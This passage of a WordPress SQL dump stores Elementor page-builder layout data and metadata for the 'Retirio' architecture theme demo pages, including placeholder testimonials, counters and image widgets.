right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"REDESIGN LIFE\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">We believe that interior design is beyond aesthetic and function, it should represent personality and characteristic of a person. We capture the spirit, passion and taste of out client and apply them into design. Our brand spirit \\u2018\\u2019redesign life\\u2019\\u2019 is about giving major change to people\\u2019\\u2019s life and makes their home as inspiring place.<\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about retirio\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"+ 1800-111-543 \",\"phone_address\":\"1800111543\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3120,4754,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3121,4754,'_elementor_pro_version','3.8.1'),(3122,4754,'_elementor_css','a:6:{s:4:\"time\";i:1685009833;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:4:{i:0;s:8:\"fa-solid\";i:3;s:3:\"all\";i:4;s:0:\"\";i:6;s:8:\"flaticon\";}s:20:\"dynamic_elements_ids\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(3124,4755,'_wp_page_template','elementor_header_footer'),(3125,4755,'_elementor_edit_mode','builder'),(3126,4755,'_elementor_template_type','wp-page'),(3127,4755,'_elementor_version','3.8.1'),(3128,4755,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"